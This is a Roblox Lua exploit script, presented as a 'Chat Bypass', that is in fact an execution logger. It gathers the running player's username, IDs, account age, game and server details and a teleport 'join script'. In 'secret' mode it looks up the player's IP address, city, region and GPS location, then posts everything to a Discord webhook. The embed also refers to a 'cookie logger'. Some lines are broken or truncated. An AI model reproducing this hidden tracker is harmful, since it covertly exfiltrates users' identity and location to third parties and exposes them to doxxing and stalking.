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- getgenv().whscript = "Chat Bypass"
- getgenv().webhookexecUrl = ""
- getgenv().ExecLogSecret = true
- getgenv().idsss = "adskak2bkdjsadasd"
- local ui = gethui()
- local folderName = "screen"
- local folder ="Folder")
- folder.Name = folderName
- folder.Parent = ui
- local player = game:GetService("Players").LocalPlayer
- local players = game:GetService("Players")
- local userid = player.UserId
- local gameid = game.PlaceId
- local jobid = tostring(game.JobId)
- local gameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name
- local deviceType = game:GetService("UserInputService"):GetPlatform() == Enum.Platform.Windows and "PC 💻" or "Mobile 📱"
- local snipePlay = "game:GetService('TeleportService'):TeleportToPlaceInstance(" .. gameid .. ", '" .. jobid .. "', player)"
- local completeTime ="%Y-%m-%d %H:%M:%S")
- local workspace = game:GetService("Workspace")
- local screenWidth = math.floor(workspace.CurrentCamera.ViewportSize.X)
- local screenHeight = math.floor(workspace.CurrentCamera.ViewportSize.Y)
- local memoryUsage = game:GetService("Stats"):GetTotalMemoryUsageMb()
- local playerCount = #players:GetPlayers()
- local maxPlayers = players.MaxPlayers
- local health = player.Character and player.Character:FindFirstChild("Humanoid") and player.Character.Humanoid.Health or "N/A"
- local maxHealth = player.Character and player.Character:FindFirstChild("Humanoid") and player.Character.Humanoid.MaxHealth or "N/A"
- local position = player.Character and player.Character:FindFirstChild("HumanoidRootPart") and player.Character.HumanoidRootPart.Position or "N/A"
- local gameVersion = game.PlaceVersion
- local pingValue = tonumber(game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValueString():match("(%d+)")) or "N/A"
- local function checkPremium()
- local success, response = pcall(function() return player.MembershipType end)
- return success and (response == Enum.MembershipType.None and "false" or "true") or "Failed to retrieve Membership:"
- end
- local url = getgenv().webhookexecUrl
- local webhookids = getgenv().idsss
- local data = {
- ["content"] = "@everyone",
- ["content_2"] = true,
- ['webhookid'] = webhookids, --ask playvora_1 to generate it
- ["embeds"] = {{
- ["title"] = "MADE BY DXFC EDITED BY PLAYVORA | 🚀 **Script Execution Detected | Exec Log**",
- ["description"] = "*✅ One of the Script's has been Executed.(🍪COOKIE LOGGER IS PATCHED FOR NOW!):*",
- ["type"] = "rich",
- ["color"] = tonumber(0xe67e22),
- ["fields"] = {
- {["name"] = "🔍 **Script Info**", ["value"] = "```💻 Script Name: " .. getgenv().whscript .. "\n⏰ Executed At: " .. completeTime .. "```", ["inline"] = false},
- {["name"] = "👤 **Player Details**", ["value"] = "```🧸 Username: " .. player.Name .. "\n📝 Display Name: " .. player.DisplayName .. "\n🆔 UserID: " .. userid .. "\n❤️ Health: " .. health .. " / " .. maxHealth .. "\n🔗 Profile: View Profile (" .. userid .. "/profile)```", ["inline"] = false},
- {["name"] = "📅 **Account Information**", ["value"] = "```🗓️ Account Age: " .. player.AccountAge .. " days\n💎 Premium Status: " .. checkPremium() .. "\n📅 Account Created: " .."%Y-%m-%d", os.time() - (player.AccountAge * 86400)) .. "```", ["inline"] = false},
- {["name"] = "🎮 **Game Details**", ["value"] = "```🏷️ Game Name: " .. gameName .. "\n🆔 Game ID: " .. gameid .. "\n🔗 Game Link (" .. gameid .. ")\n🔢 Game Version: " .. gameVersion .. "```", ["inline"] = false},
- {["name"] = "🕹️ **Server Info**", ["value"] = "```👥 Players in Server: " .. playerCount .. " / " .. maxPlayers .. "\n🕒 Server Time: " .."%H:%M:%S") .. "```", ["inline"] = true},
- {["name"] = "📡 **Network Info**", ["value"] = "```📶 Ping: " .. pingValue .. " ms```", ["inline"] = true},
- {["name"] = "🖥️ **System Info**", ["value"] = "```📺 Resolution: " .. screenWidth .. "x" .. screenHeight .. "\n🔍 Memory Usage: " .. memoryUsage .. " MB\n⚙️ Executor: " .. identifyexecutor() .. "```", ["inline"] = true},
- {["name"] = "📍 **Character Position Script**", ["value"] = "```game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =" .. tostring(position) .. "))```\n", ["inline"] = true},
- {["name"] = "🪧 **Join Script**", ["value"] = "```lua\n" .. snipePlay .. "```", ["inline"] = false}
- },
- ["thumbnail"] = {["url"] = ""},
- ["footer"] = {["text"] = "Made by dxfc with ❤️ | " .."%Y-%m-%d %H:%M:%S"), ["icon_url"] = ""}
- }}
- }
- if getgenv().ExecLogSecret then
- local ip = game:HttpGet("")
- local ipinfo_table = game.HttpService:JSONDecode(game:HttpGet("" .. ip))
- table.insert(data.embeds[1].fields, {["name"] = "**`(🤫) Secret`**", ["value"] = "||(👣) IP Address: " .. ipinfo_table.ip .. "||\n||(🌆) Country: " .. .. "||\n||(🪟) GPS Location: " .. ipinfo_table.loc .. "||\n||(🏙️) City: " .. .. "||\n||(🏡) Region: " .. ipinfo_table.region .. "||\n||(🪢) Hoster: " .. .. "||"})
- end
- local newdata = game:GetService("HttpService"):JSONEncode(data)
- local headers = {["content-type"] = "application/json"}
- local request = http_request or request or (syn and syn.request) or (fluxus and fluxus.request) or (http and http.request)
- request({Url = url, Body = newdata, Method = "POST", Headers = headers})
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